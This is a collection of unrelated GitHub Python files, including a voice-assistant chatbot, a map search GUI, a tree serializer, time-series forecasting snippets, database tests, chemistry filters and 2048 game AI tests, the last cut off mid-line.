modules.conversation import speech_text, text_speech\nfrom num2words import num2words\nimport numpy as np\nimport json\nimport pickle\nimport random\nimport datetime\nfrom datetime import date\n#import object_finder\n\nUSER_DIRECTORY = \"user\"\n\n#Greetings at 
beginning\ndef greetMe():\n    msg = []\n    curr_hour = int(datetime.datetime.now().hour)\n    if curr_hour >= 0 and curr_hour < 12:\n        #msg = \"Good Morning\"\n        msg.append(263)\n    elif curr_hour >= 12 and curr_hour < 18:\n        #msg = \"Good Afternoon\"\n        msg.append(264)\n    elif curr_hour >= 18:\n        #msg = \"Good Evening\"\n        msg.append(265)\n    \n    return msg\n\ndef run():\n    s_t = speech_text()\n    t_s = text_speech()\n\n    date_today = date.today()\n\n    stemmer = PorterStemmer()\n\n    reply = []\n\n    #Objects to be found\n    objects = {\"toothbrush\": 291 ,\"tooth brush\": 292 ,\"hair dryer\": 293 ,\"teddy bear\": 294 ,\"scissors\": 295 ,\"vase\": 296 ,\n               \"clock\": 297 ,\"book\": 298 ,\"cell phone\": 299 ,\"mobile\": 300 ,\"remote\": 301 ,\"controller\": 302 ,\"mouse\": 303 ,\n               \"potted plant\": 304 ,\"cake\": 305 ,\"donut\": 306 ,\"pizza\": 307 ,\"carrot\": 308 ,\"broccoli\": 309 ,\"orange\": 310 ,\n               \"sandwich\": 311 ,\"apple\": 312 ,\"banana\": 313 ,\"bowl\": 314 ,\"spoon\": 315 ,\"fork\": 316 ,\"knife\": 317 ,\"bottle\": 318 ,\n               \"cup\": 319 ,\"tie\": 320 ,\"handbag\": 321 ,\"umbrella\": 322 ,\"backpack\": 323 ,\"car\": 324}\n\n    try:\n        with open(\"data/response.json\") as file:\n            data = json.load(file)\n        print(\"[INFO] Response file found.\")\n\n        with open(\"data/data.pickle\", \"rb\") as f:\n            words,labels,feature,output = pickle.load(f)\n        print(\"[INFO] Data file found.\\n------Loading...\")\n    except Exception:\n        print(\"[INFO] Some data files are missing.\\n[ALERT] Aborting...\")\n        #t_s.speak_now(\"Fatal error, data files are not found. Aborting system...\")\n        t_s.speak_female([325])\n        print(\"[INFO] Please make sure both 'data.pickle' and 'response.json' are present in the folder 'data'\")\n        sys.exit()\n\n    try:\n        interpreter = tflite.Interpreter(model_path=\"tflite_model/model.tflite\")\n    except Exception:\n        print(\"[INFO] Model not found.\\n[ALERT] Aborting...\")\n        #t_s.speak_now(\"Fatal error, Model not found. 
Aborting system...\")\n t_s.speak_female([326])\n print(\"[INFO] Please make sure 'model.tflite' is present in the folder 'tflite_model'\")\n sys.exit()\n\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n floating_model = input_details[0]['dtype'] == np.float32\n\n #Answer when confidence score is very less\n #no_answer = [\"I do not have an answer for this.\", \"I never thought that way.\", \"I never heard the words you said, please ask a different question.\"]\n no_answer = [288,289,290]\n\n print(\"before\")\n\n #Make 'user' directory if not exists\n if not os.path.exists(f'{USER_DIRECTORY}'):\n os.mkdir(f'{USER_DIRECTORY}')\n\n #Initial greeting\n msg_list = greetMe()\n t_s.speak_female(msg_list)\n #time.sleep(0.3)\n t_s.speak_female([285]) #How can I help you?\n\n #Conversation\n while True:\n reply = []\n print(\"listening...\")\n msg = s_t.listen(isFemale=True) # Get voice command from user\n query = msg[:] # Copy the command\n print(\"User : \",msg)\n\n if 'reset' in msg.split() or 'delete' in msg.split() or 'erase' in msg.split():\n reset_data(isFemale=True)\n msg = s_t.listen() # Get voice command from user\n query = msg[:] # Copy the command\n print(\"User : \",msg)\n\n msg = word_tokenize(msg)\n msg = [stemmer.stem(w.lower()) for w in msg if w!='?']\n\n bag = [0 for _ in range(len(words))]\n\n for i, wrd in enumerate(words):\n if wrd in msg:\n bag[i] = 1\n\n input_data = np.array(bag)\n\n if floating_model:\n input_data = np.float32(input_data)\n\n interpreter.set_tensor(input_details[0]['index'],[input_data]) #Feeding input to the model\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n\n results = np.squeeze(output_data)\n max_confidence_idx = np.argmax(results) #Output from model\n res_label = labels[max_confidence_idx]\n #print(labels[max_confidence_idx])\n\n # Found a desirable output label\n if results[max_confidence_idx] > 0.85:\n reply = []\n for intent in data:\n if intent[\"tag\"] == res_label:\n if res_label == \"date\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.strftime(\"%d %B %Y\"))\n reply.append(random.choice(intent[\"response_id\"]))\n dt = date_today.strftime(\"%d %B %Y\")\n d,m,y = dt.split()\n t_s.speak_female(reply)\n reply[0] = num2words(int(d),to='ordinal')\n reply.append(\"of\")\n #t_s.speak_female(reply,isFast=True)\n reply.append(m)\n reply.append(y)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"year\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.year)\n reply.append(random.choice(intent[\"response_id\"]))\n yr = date_today.year\n reply.append(yr)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"day\":\n #reply = str(random.choice(intent[\"responses\"])).format(date_today.strftime(\"%A\"))\n reply.append(random.choice(intent[\"response_id\"]))\n dt = date_today.strftime(\"%A\")\n reply.append(dt)\n t_s.speak_female(reply,isFast=True)\n elif res_label == \"time\":\n time_now = datetime.datetime.now().strftime(\"%I %M %p\")\n #reply = str(random.choice(intent[\"responses\"])).format(time_now.strftime(\"%I:%M %p\"))\n reply.append(random.choice(intent[\"response_id\"]))\n h,m,mer = time_now.split()\n if h!=0: reply.append(int(h))\n else: reply.append(12)\n if m!=0: reply.append(int(m))\n reply.append(mer)\n t_s.speak_female(reply,isFast=True) \n else:\n #reply = random.choice(intent[\"responses\"])\n 
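# for all other intents, pick one pre-recorded response id for the matched tag and speak it\n                        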
reply.append(random.choice(intent[\"response_id\"]))\n t_s.speak_female(reply)\n print(intent[\"tag\"],reply,type(reply[0]))\n break\n\n print(\"Bot : \",reply,results[max_confidence_idx])\n \n if res_label == \"search\":\n reply = []\n obj = \"\"\n obj_id = -1\n for x in objects.keys():\n if x in query:\n obj = x[:]\n obj_id = objects[x]\n break\n if obj == \"\":\n reply.append(286)\n t_s.speak_female(reply)\n #t_s.speak_now(\"Sorry! I do not recognise the object you asked for...\")\n print(\"Bot : Sorry! I do not recognise the object you asked for...\")\n else:\n #Found the name of the object\n #Iintiating object detection algorithm\n #os.system('python3 TFLite_detection_webcam.py --object_to_found='+obj)\n ####object_finder.finder(obj)\n #t_s.speak_now(\"Here is your \"+obj) #Returned the object to the user\n reply.append(287)\n reply.append(obj_id)\n t_s.speak_female(reply,isFast=True)\n \n elif res_label == \"goodbye\": # Quit Bot\n break\n else: # Cound not find a desirable output\n reply = []\n #reply = random.choice(no_answer)\n reply.append(random.choice(no_answer))\n t_s.speak_female(reply)\n #t_s.speak_now(reply)\n print(\"Bot : \", reply, results[max_confidence_idx])\n","repo_name":"imrk97/final_year_project","sub_path":"final_project/Hope_female.py","file_name":"Hope_female.py","file_ext":"py","file_size_in_byte":9103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5084356833","text":"\nimport folium\nimport sys\nimport io\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView \nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QToolButton\nfrom GeoSearch import GeoSearcher\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n\n def initUi(self):\n self.main_ui = uic.loadUi('interface-v0.2.ui')\n self.settings_ui = uic.loadUi('settings.ui')\n\n self.main_ui.searchButton.clicked.connect(self.search_button_clicked)\n\n self.load_map(-5.888947323651743, -35.21097641464734)\n self.geocoord = GeoSearcher()\n\n self.main_ui.show()\n\n\n def search_button_clicked(self):\n address = self.main_ui.addressTextEdit.toPlainText()\n print(address)\n lat, lon = self.geocoord.find(address=address)\n print(lat, lon)\n self.load_map(lat, lon)\n\n \n def load_map(self, lat, lon, zoom=15):\n m = folium.Map(tiles='Stamen Terrain', zoom_start=zoom, location=(lat, lon))\n data = io.BytesIO()\n m.save(data, close_file=False)\n self.main_ui.mapWidget.setHtml(data.getvalue().decode())\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n window = Ui()\n sys.exit(app.exec())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"jpfcabral/map-search-app","sub_path":"MySearchApp.py","file_name":"MySearchApp.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21451963155","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return \"\"\n nodes = []\n q = [root]\n while q:\n node = q.pop(0)\n if node:\n nodes.append(node.val)\n q.append(node.left)\n q.append(node.right)\n else:\n nodes.append('X')\n return \",\".join(str(c) for c in nodes)\n\n def 
deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n if not data:\n return None\n data = data.split(\",\")\n root = TreeNode(data[0])\n q = [root]\n idx = 1\n while idx < len(data):\n node = q.pop(0)\n if data[idx] != 'X':\n left_node = TreeNode(data[idx])\n node.left = left_node\n q.append(left_node)\n idx += 1\n if data[idx] != 'X':\n right_node = TreeNode(data[idx])\n node.right = right_node\n q.append(right_node)\n idx += 1\n return root\n\n \n\n \n\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# ans = deser.deserialize(ser.serialize(root))","repo_name":"jerrt2003/leetcode-in-python","sub_path":"297_Serialize_and_Deserialize_Binary_Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12548563491","text":"import simpy\n\nfrom src.utils.debug import *\nfrom src.sys import (\n node,\n task as task_module,\n)\n\n\nclass Server(node.Node):\n def __init__(\n self,\n env: simpy.Environment,\n _id: str,\n sink: node.Node = None,\n ):\n super().__init__(env=env, _id=_id)\n self.sink = sink\n\n self.task_in_serv = None\n self.serv_start_time = None\n self.task_store = simpy.Store(env)\n self.recv_tasks_proc = env.process(self.recv_tasks())\n\n def __repr__(self):\n # return (\n # \"Server( \\n\"\n # f\"{super().__repr__()} \\n\"\n # \")\"\n # )\n\n return f\"Server(id= {self._id})\"\n\n def repr_w_state(self):\n return (\n \"Server( \\n\"\n f\"\\t num_tasks_left= {self.num_tasks_left()} \\n\"\n f\"\\t work_left= {self.work_left()} \\n\"\n \")\"\n )\n\n def num_tasks_left(self) -> int:\n return len(self.task_store.items) + int(self.task_in_serv is not None)\n\n def work_left(self) -> float:\n remaining_serv_time = 0\n if self.task_in_serv:\n remaining_serv_time = self.task_in_serv.service_time - (self.env.now - self.serv_start_time)\n\n return remaining_serv_time + sum(task.service_time for task in self.task_store.items)\n\n def put(self, task: task_module.Task):\n slog(DEBUG, self.env, self, \"recved\", task=task)\n\n task.node_id = self._id\n self.task_store.put(task)\n\n def recv_tasks(self):\n slog(DEBUG, self.env, self, \"started\")\n\n num_tasks_proced = 0\n while True:\n self.task_in_serv = yield self.task_store.get()\n self.serv_start_time = self.env.now\n yield self.env.timeout(self.task_in_serv.service_time)\n\n num_tasks_proced += 1\n slog(DEBUG, self.env, self,\n \"processed\",\n task_in_serv=self.task_in_serv,\n num_tasks_proced=num_tasks_proced,\n queue_len=len(self.task_store.items),\n )\n\n self.sink.put(self.task_in_serv)\n self.task_in_serv = None\n\n slog(DEBUG, self.env, self, \"done\")\n","repo_name":"mfatihaktas/load-balancing-w-thompson-sampling","sub_path":"src/sys/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72524118567","text":"#ARMA\nmodel = ARMA(earthquake, order=(3,1))\nresults = model.fit()\nprint(results.summary())\n#ARMAX\n# Instantiate the model\nmodel = ARMA(hospital['wait_times_hrs'], order=(2,1), \n exog=hospital['nurse_count'])\nresults = model.fit()\n# Print model fit summary\nprint(results.summary())\n\n# Generate predictions\none_step_forecast = results.get_prediction(start=-30)\n# Extract prediction mean\nmean_forecast = one_step_forecast.predicted_mean\n# Get 
confidence intervals of predictions\nconfidence_intervals = one_step_forecast.conf_int()\n# Select lower and upper confidence limits\nlower_limits = confidence_intervals.loc[:,'lower close']\nupper_limits = confidence_intervals.loc[:,'upper close']\n# Print best estimate predictions\nprint(mean_forecast)\n\n# plot the amazon data\nplt.plot(amazon.index, amazon, label='observed')\n\n# plot your mean predictions\nplt.plot(mean_forecast.index, mean_forecast, color='r', label='forecast')\n\n# shade the area between your confidence limits\nplt.fill_between(lower_limits.index, lower_limits, \n upper_limits, color='pink')\n\n# set labels, legends and show plot\nplt.xlabel('Date')\nplt.ylabel('Amazon Stock Price - Close USD')\nplt.legend()\nplt.show()\n\n#SAME BUT DYNAMIC, NOT 1 STEP\n# Generate Dynamic predictions\ndynamic_forecast = results.get_prediction(start=-30, dynamic=True)\n\n# Extract prediction mean\nmean_forecast = dynamic_forecast.predicted_mean\n\n# Get confidence intervals of predictions\nconfidence_intervals = dynamic_forecast.conf_int()\n\n# Select lower and upper confidence limits\nlower_limits = confidence_intervals.loc[:,'lower close']\nupper_limits = confidence_intervals.loc[:,'upper close']\n\n# Print best estimate predictions\nprint(mean_forecast)\n\n#SAME BUT WITH SARIMAX\n# Create ARIMA(2,1,2) model\narima = SARIMAX(amazon, order=(2,1,2))\narima_results = arima.fit()\narima_value_forecast = arima_results.get_forecast(steps=10).predicted_mean\nprint(arima_value_forecast)","repo_name":"AntonYurievNikolov/PythonTests","sub_path":"ARIMA/Fitting ARMA models.py","file_name":"Fitting ARMA models.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14007721778","text":"from typing import Callable\n\nfrom rdkit.Chem import AllChem, Crippen, Lipinski, Mol, rdMolDescriptors\nfrom rdkit.DataStructs import TanimotoSimilarity\nfrom rdkit.DataStructs.cDataStructs import UIntSparseIntVect\n\nfrom mol_gen.exceptions import FilterException, UndesirableMolecule\n\nDESCRIPTOR_TO_FUNCTION: dict[str, Callable[[Mol], int | float]] = {\n \"hydrogen_bond_acceptors\": Lipinski.NumHAcceptors,\n \"hydrogen_bond_donors\": Lipinski.NumHDonors,\n \"molar_refractivity\": Crippen.MolMR,\n \"molecular_weight\": rdMolDescriptors.CalcExactMolWt,\n \"partition_coefficient\": Crippen.MolLogP,\n \"rotatable_bonds\": rdMolDescriptors.CalcNumRotatableBonds,\n \"topological_polar_surface_area\": rdMolDescriptors.CalcTPSA,\n}\n\n\ndef check_only_allowed_elements_present(mol: Mol, allowed_elements: list[str]) -> None:\n \"\"\"Check if the atoms in a molecule only correspond to allowed elements.\n\n Args:\n mol (Mol): Molecule to check.\n allowed_elements (list[str]): Allowed elements.\n\n Raises:\n UndesirableMolecule: If atoms correspond to other elements.\n \"\"\"\n for atom in mol.GetAtoms():\n element = atom.GetSymbol()\n if element not in allowed_elements:\n raise UndesirableMolecule(f\"Element {element} not in allowed_elements.\")\n\n\ndef check_descriptor_within_range(\n mol: Mol,\n descriptor: str,\n min: int | float | None = None,\n max: int | float | None = None,\n) -> None:\n \"\"\"Calculate descriptor of molecule and compare to allowed min and max values.\n\n Implemented descriptor names are defined in DESCRIPTOR_TO_FUNCTION.\n\n Args:\n descriptor (str): Name of descriptor to calculate.\n mol (Mol): Molecule to calculate descriptor with.\n min (int | float | None, optional): Minimum allowed value. 
Defaults to None.\n max (int | float | None, optional): Maximum allowed value. Defaults to None.\n\n Raises:\n FilterException: If descriptor to calculate is unrecognised.\n UndesirableMolecule: If descriptor is outside the allowed range of values.\n \"\"\"\n try:\n func = DESCRIPTOR_TO_FUNCTION[descriptor]\n except KeyError:\n raise FilterException(f\"Descriptor {descriptor} unrecognised.\")\n\n value = func(mol)\n try:\n check_value_within_range(value, min=min, max=max)\n except UndesirableMolecule as e:\n raise UndesirableMolecule(\n f\"Descriptor {descriptor} out of allowed range of values: {e}\"\n )\n\n\ndef check_value_within_range(\n val: int | float,\n min: int | float | None = None,\n max: int | float | None = None,\n):\n \"\"\"Check if value is within the allowed min and max values.\n\n Args:\n val (int | float): Value to compare.\n min (int | float | None, optional): Minimum allowed value. Defaults to None.\n max (int | float | None, optional): Maximum allowed value. Defaults to None.\n\n Raises:\n UndesirableMolecule: If descriptor is outside the allowed range of values.\n \"\"\"\n if (min is not None) and (min > val):\n raise UndesirableMolecule(f\"Value {val} less than minimum allowed value {min}.\")\n\n if (max is not None) and (max < val):\n raise UndesirableMolecule(\n f\"Value {val} greater than maximum allowed value {max}.\"\n )\n\n\ndef check_tanimoto_score_above_threshold(\n mol: Mol, fingerprint: UIntSparseIntVect, min: int | float\n):\n \"\"\"Compare molecule to Morgan fingerprint by Tanimoto scoring.\n\n Args:\n mol (Mol): Molecule to check.\n fingerprint (UIntSparseIntVect): Morgan fingerprint to compare against.\n min (int | float): Minimum allowed Tanimoto score.\n\n Raises:\n UndesirableMolecule: If Tanimoto score is less than the minimum allowed value.\n \"\"\"\n fp2 = AllChem.GetMorganFingerprint(mol, 2)\n score = TanimotoSimilarity(fingerprint, fp2)\n\n if score < min:\n raise UndesirableMolecule(\n f\"Tanimoto score {score} less than minimum allowed value {min}.\"\n )\n","repo_name":"a-whitehouse/mol-gen","sub_path":"src/mol_gen/preprocessing/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72416356329","text":"import xgboost as xgb\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import confusion_matrix, log_loss\r\nfrom utility import *\r\n\r\ndef final_model(data):\r\n y = data['is_duplicate']\r\n data = data.drop(['is_duplicate'], axis = 1)\r\n\r\n X_train,X_test, y_train, y_test = train_test_split(data, y, stratify = y, test_size=0.3)\r\n\r\n X_train = standardize_data(X_train)\r\n X_test = standardize_data(X_test)\r\n \r\n clf = logistic_regressor(X_train, X_test, y_train, y_test)\r\n\r\n XGboost(X_train, X_test, y_train, y_test, clf)\r\n\r\ndef XGboost(X_train, X_test, y_train, y_test, clf):\r\n print(\"running XGboost Model\") \r\n params = {}\r\n params['objective'] = 'binary:logistic'\r\n params['eval_metric'] = 'logloss'\r\n params['eta'] = 0.02\r\n params['max_depth'] = 4\r\n\r\n d_train = xgb.DMatrix(X_train, label=y_train)\r\n d_test = xgb.DMatrix(X_test, label=y_test)\r\n\r\n watchlist = [(d_train, 'train'), (d_test, 'valid')]\r\n\r\n bst = xgb.train(params, d_train, 400, watchlist, early_stopping_rounds=20, 
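\r\n                    # up to 400 boosting rounds; with early_stopping_rounds=20, training halts once the validation logloss stops improving for 20 rounds\r\n                    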
verbose_eval=10)\r\n\r\n xgdmat = xgb.DMatrix(X_train,y_train)\r\n predict_y = bst.predict(d_test)\r\n print(\"The test log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n\r\n\r\ndef logistic_regressor(X_train, X_test, y_train, y_test):\r\n print(\"running logistic regression Model\")\r\n alpha = [10 ** x for x in range(-5, 2)] # hyperparam for SGD classifier.\r\n\r\n log_error_array=[]\r\n for i in alpha:\r\n clf = SGDClassifier(alpha=i, penalty='l2', loss='log', random_state=42)\r\n clf.fit(X_train, y_train)\r\n sig_clf = CalibratedClassifierCV(clf, method=\"sigmoid\")\r\n sig_clf.fit(X_train, y_train)\r\n predict_y = sig_clf.predict_proba(X_test)\r\n log_error_array.append(log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n print('For values of alpha = ', i, \"The log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n\r\n\r\n\r\n best_alpha = np.argmin(log_error_array)\r\n clf = SGDClassifier(alpha=alpha[best_alpha], penalty='l2', loss='log', random_state=42)\r\n clf.fit(X_train, y_train)\r\n sig_clf = CalibratedClassifierCV(clf, method=\"sigmoid\")\r\n sig_clf.fit(X_train, y_train)\r\n\r\n predict_y = sig_clf.predict_proba(X_train)\r\n print('For values of best alpha = ', alpha[best_alpha], \"The train log loss is:\",log_loss(y_train, predict_y, labels=clf.classes_, eps=1e-15))\r\n predict_y = sig_clf.predict_proba(X_test)\r\n print('For values of best alpha = ', alpha[best_alpha], \"The test log loss is:\",log_loss(y_test, predict_y, labels=clf.classes_, eps=1e-15))\r\n predicted_y =np.argmax(predict_y,axis=1)\r\n print(\"Total number of data points :\", len(predicted_y))\r\n #plot_confusion_matrix(y_test, predicted_y)\r\n\r\n return clf\r\n# This function plots the confusion matrices given y_i, y_i_hat.\r\ndef plot_confusion_matrix(test_y, predict_y):\r\n C = confusion_matrix(test_y, predict_y)\r\n \r\n plt.figure(figsize=(20,4))\r\n \r\n labels = [1,2]\r\n # representing A in heatmap format\r\n cmap=sns.light_palette(\"blue\")\r\n #plt.subplot(1, 1, 1)\r\n sns.heatmap(C, annot=True, cmap=cmap, fmt=\".3f\", xticklabels=labels, yticklabels=labels)\r\n plt.xlabel('Predicted Class')\r\n plt.ylabel('Original Class')\r\n plt.title(\"Confusion matrix\")\r\n \r\n plt.show()\r\n\r\n","repo_name":"tarangchaturvedi/quora_question_similarity","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8545265137","text":"import requests\nfrom collections import Counter\n\nSTOCK_DATA = 'https://bites-data.s3.us-east-2.amazonaws.com/stocks.json'\n\n# pre-work: load JSON data into program\n\nwith requests.Session() as s:\n data = s.get(STOCK_DATA).json()\n\ndef _cap_str_to_mln_float(cap):\n \"\"\"If cap = 'n/a' return 0, else:\n - strip off leading '$',\n - if 'M' in cap value, strip it off and return value as float,\n - if 'B', strip it off and multiple by 1,000 and return\n value as float\"\"\"\n cap = cap.lstrip('$')\n if cap == 'n/a':\n return 0\n if 'M' in cap:\n return float(cap.replace('M', ''))\n if 'B' in cap:\n return float(cap.replace('B', '')) * 1000\n\ndef get_industry_cap(industry):\n \"\"\"Return the sum of all cap values for given industry, use\n the _cap_str_to_mln_float to parse the cap values,\n return a float with 2 digit precision\"\"\"\n ret = sum(_cap_str_to_mln_float(line[\"cap\"])\n for line in data if line[\"industry\"] == industry)\n return round(ret, 
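\n                 # keep two decimals of precision, as the docstring promises\n                 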
2)\n\ndef get_stock_symbol_with_highest_cap():\n \"\"\"Return the stock symbol (e.g. PACD) with the highest cap, use\n the _cap_str_to_mln_float to parse the cap values\"\"\"\n stocks_sorted = sorted(data, key=lambda x: _cap_str_to_mln_float(x[\"cap\"]))\n return stocks_sorted[-1]['symbol']\n\ndef get_sectors_with_max_and_min_stocks():\n \"\"\"Return a tuple of the sectors with most and least stocks,\n discard n/a\"\"\"\n cnt = Counter([x[\"sector\"] for x in data\n if x[\"sector\"] != 'n/a']).most_common()\n return cnt[0][0], cnt[-1][0]\n\n # sectors = Counter(k['sector']\n # for k in data\n # if k.get('sector'))\n #\n # minimum = min(sectors, key=sectors.get)\n # maximum = sectors.most_common(2)[-1][0]\n # return (maximum, minimum)\n","repo_name":"SimonSlominski/Pybites_Exercises","sub_path":"Pybites/129/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35151194341","text":"from asyncpgsa import pg\nimport pytest\nimport sqlalchemy as sa\n\nfrom . import HOST, PORT, USER, PASS, DB_NAME\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef init_pg(event_loop):\n \"\"\"\n Initializes the pg connection before each test in the module.\n :param event_loop: Active event loop for the test run\n :return: None\n \"\"\"\n event_loop.run_until_complete(pg.init(\n host=HOST,\n port=PORT,\n database=DB_NAME,\n user=USER,\n # loop=loop,\n password=PASS,\n min_size=1,\n max_size=10\n ))\n\nquery = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n\n\nasync def test_pg_query_async_with_statement():\n ps = pg.query(query)\n async with ps as cursor:\n row = sentinel = object()\n async for row in cursor:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n if row is sentinel:\n pytest.fail('Cursor had no data')\n\n\nasync def test_pg_query_with_bad_with_statement():\n ps = pg.query(query)\n\n with pytest.raises(RuntimeError) as exc_info:\n with ps as cursor:\n async for row in cursor:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n result = 2\n\n assert result == 2\n\n assert str(exc_info.value) == 'Must use \"async with\"'\n\n\nasync def test_pg_query_with_no_results():\n ps = pg.query(\"SELECT * FROM pg_tables WHERE tablename='bob'\")\n async with ps as cursor:\n async for row in cursor:\n raise Exception('Should not have hit this line')\n\n\nasync def test_pg_queury_with_await():\n ps = pg.query(query)\n results = await ps\n row = sentinel = object()\n for row in results:\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n if row is sentinel:\n pytest.fail('No results')\n\nasync def test_fetch():\n for row in await pg.fetch(query):\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n assert 1 == 1\n\n\nasync def test_fetch_nonetype():\n query = \"SELECT * FROM pg_tables WHERE tablename='foobar_doesnt_exist'\"\n result = await pg.fetch(query)\n for r in result:\n assert False, 'Should not have any data'\n\n\nasync def test_fetchrow():\n row = await pg.fetchrow(query)\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_fetchrow_nonetype():\n query = \"SELECT * FROM pg_tables WHERE tablename='foobar_doesnt_exist'\"\n result = await pg.fetchrow(query)\n assert not bool(result)\n\n\nasync 
def test_fetchrow_sometype():\n    result = await pg.fetchrow(query)\n    assert bool(result), 'Fetchrow should be truthy with data.'\n\n\nasync def test_execute():\n    script = \"SELECT 1; SELECT 2;\"\n    result = await pg.execute(script)\n    assert bool(result)\n\n\nasync def test_fetchval():\n    value = await pg.fetchval(query, column=2)\n    assert value == 5.0\n\n    value = await pg.fetchval(query, column=0)\n    assert value == 4.0\n\n    value = await pg.fetchval(query, column=1)\n    assert value == 6.0\n\n\nasync def test_sql_with_arguments():\n    script = \"SELECT $1::INT\"\n    result = await pg.execute(script, 1)\n    assert bool(result)\n\n\nasync def test_execute_with_sa_arguments():\n    script = sa.select('*').select_from(sa.text('sqrt(:num) as a'))\n    script = script.params(num=16)\n    result = await pg.execute(script)\n    assert bool(result)\n\nasync def test_transaction():\n    async with pg.transaction() as conn:\n        for row in await conn.fetch(query):\n            assert row['a'] == 4.0\n\n\nasync def test_begin():\n    async with pg.begin() as conn:\n        for row in await conn.fetch(query):\n            assert row['a'] == 4.0\n","repo_name":"CanopyTax/asyncpgsa","sub_path":"tests/test_pgsingleton.py","file_name":"test_pgsingleton.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"53"} +{"seq_id":"24869035137","text":"# -*- coding: UTF-8 -*-\n\nimport logging\n\n# Application's version\nversion = \"1.0.0\"\n\n\nclass loggable(object):\n    \"\"\"\n    Include logger property in objects to handle log messages\n    \"\"\"\n\n    _logger = None\n\n    @property\n    def logger(self):\n        if self._logger is None:\n            logger_name = \"{}.{}\".format(\n                self.__class__.__module__,\n                self.__class__.__name__)\n\n            self._logger = logging.getLogger(logger_name)\n\n        return self._logger\n\n    @logger.setter\n    def logger(self, logger):\n        self._logger = logger","repo_name":"alissonperez/TwitterMonitor","sub_path":"twitter_monitor/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"27711181542","text":"import unittest\nfrom cp2048 import *\nfrom Ai import *\nclass AITest(unittest.TestCase):\n\n\n\n    def test_play_random_moveinfini(self):\n        jeu = Game2048()\n        print(type(jeu))\n        playRandomModed(jeu,-1)\n        self.assertTrue(jeu.gameover())\n    \n    def test_play_random_move(self):\n        jeu = Game2048()\n        li = []\n        for j in range(4):\n            g = jeu.copy()\n            g.play(j)\n            li.append(g.game)\n        playRandomModed(jeu, 1)\n        self.assertIn(jeu.game, li)\n    # Check that im does not change between two attempts, to make sure the right move is chosen\n    def test_strat_2048(self):\n        averages = [0,0,0,0]\n        jeu = Game2048(numpy.array([[0,0,2,8],[0,0,2,4],[0,0,0,0],[0,0,0,0]]))\n        for firstMove in range(4):\n            for i in range(250):\n                test = jeu.copy()\n                if not(test.gameover()):\n                    test.play(firstMove)\n                    averages[firstMove] += playRandomModed(test,-1)/250\n        \n        im = 0\n        for i in range(4):\n            if averages[i] > averages[im]:\n                im = i\n        i2 = strategy_2048(jeu.game, jeu.state, jeu.moves)\n        self.assertEqual(i2, im)\n\n    def test_compute_score(self):\n        jeu = Game2048()\n        jeu.game = numpy.array([[0,0,2,8],[0,0,0,0],[0,0,0,0],[0,0,0,0]])\n        test = 0  # value to find for this board\n        i = compute_score(jeu)\n        